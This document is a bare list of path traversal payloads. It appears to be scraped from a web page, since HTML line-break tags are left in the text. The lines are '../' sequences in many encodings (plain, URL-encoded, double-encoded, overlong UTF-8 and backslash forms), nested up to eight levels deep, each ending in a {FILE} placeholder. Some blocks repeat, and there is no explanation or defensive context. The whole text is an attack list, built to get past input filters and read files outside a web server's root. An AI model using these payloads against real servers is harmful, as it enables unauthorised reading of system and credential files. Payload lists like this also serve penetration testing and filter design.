%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
